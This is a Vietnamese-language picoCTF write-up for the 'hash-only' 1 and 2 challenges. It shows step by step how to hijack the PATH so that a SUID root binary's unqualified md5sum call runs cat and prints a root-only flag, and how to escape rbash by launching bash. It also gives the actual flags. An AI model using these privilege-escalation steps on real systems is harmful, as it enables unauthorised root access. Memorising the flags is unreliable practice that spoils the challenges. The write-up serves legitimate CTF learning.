pwn - hash only 12

Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!

November 4, 2025 September 9, 2025 Medium
Author Author Hung Nguyen Tuong

hash-only-1 (Medium) 

ctf-player@pico-chall$ ls -la
total 24
drwxr-xr-x 1 ctf-player ctf-player    20 Sep 10 02:27 .
drwxr-xr-x 1 root       root          24 Aug 21 19:35 ..
drwx------ 2 ctf-player ctf-player    34 Sep 10 02:27 .cache
-rw-r--r-- 1 root       root          67 Aug 21 19:35 .profile
-rwsr-xr-x 1 root       root       18312 Aug 21 19:35 flaghasher

Binary flaghasher có bật SUID permission bit, ai cũng có thể thực thi với quyền root.

ctf-player@pico-chall$ ./flaghasher 
Computing the MD5 hash of /root/flag.txt.... 

e86d7700e5500bcb26bf2140b8af5b96  /root/flag.txt

Ta thấy flaghasher in ra MD5 hash của flag, vậy thử xem binary md5sum được gọi với absolate path hay không?

ctf-player@pico-chall$ strings flaghasher | grep md5
/bin/bash -c 'md5sum /root/flag.txt'

Không có absolute path. Vậy ta có thể hijack binary md5sum này bằng một binary cat để in ra flag:

ctf-player@pico-chall$ cp `which cat` md5sum
ctf-player@pico-chall$ ls -la
total 68
drwxr-xr-x 1 ctf-player ctf-player    34 Sep 10 02:30 .
drwxr-xr-x 1 root       root          24 Aug 21 19:35 ..
drwx------ 2 ctf-player ctf-player    34 Sep 10 02:27 .cache
-rw-r--r-- 1 root       root          67 Aug 21 19:35 .profile
-rwsr-xr-x 1 root       root       18312 Aug 21 19:35 flaghasher
-rwxr-xr-x 1 ctf-player ctf-player 43416 Sep 10 02:30 md5sum
ctf-player@pico-chall$ export PATH=$PWD:$PATH
ctf-player@pico-chall$ echo $PATH
/home/ctf-player:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
ctf-player@pico-chall$ ./flaghasher 
Computing the MD5 hash of /root/flag.txt.... 

picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_07e85021}

hash-only-2 (Medium) 

ctf-player@pico-chall$ ls -la
total 4
drwxr-xr-x 1 ctf-player ctf-player 20 Sep 10 02:33 .
drwxr-xr-x 1 root       root       24 Aug 21 19:28 ..
drwx------ 2 ctf-player ctf-player 34 Sep 10 02:33 .cache
-rw-r--r-- 1 root       root       67 Aug 21 19:28 .profile
ctf-player@pico-chall$ cd ..
-rbash: cd: restricted

Ta đang bị hạn chế bởi shell hiện tại là rbash.

ctf-player@pico-chall$ echo $SHELL
/bin/rbash

Ta chỉ việc chạy /bin/bash để thoát ra khỏi rbash:

ctf-player@pico-chall$ /bin/bash
-rbash: /bin/bash: restricted: cannot specify `/' in command names
ctf-player@pico-chall$ bash
ctf-player@challenge:~$ cd ..
ctf-player@challenge:/home$ ls -la
total 0
drwxr-xr-x 1 root       root       24 Aug 21 19:28 .
drwxr-xr-x 1 root       root       40 Sep 10 02:32 ..
drwxr-xr-x 1 ctf-player ctf-player 41 Sep 10 02:36 ctf-player

Phần còn lại tương tự như hash-only-1:

ctf-player@challenge:/$ flaghasher
Computing the MD5 hash of /root/flag.txt.... 

dd1c78f3ca6c3f58c30ce73799a75369  /root/flag.txt
ctf-player@challenge:/$ which flaghasher
/usr/local/bin/flaghasher
ctf-player@challenge:/$ strings /usr/local/bin/flaghasher | grep md5
/bin/bash -c 'md5sum /root/flag.txt'
ctf-player@challenge:/$ cd ~
ctf-player@challenge:~$ cp `which cat` md5sum
ctf-player@challenge:~$ export PATH=$PWD:$PATH
ctf-player@challenge:~$ flaghasher
Computing the MD5 hash of /root/flag.txt.... 

picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_f3fcc367}
pwn - Handoffpwn - PIE TIME 12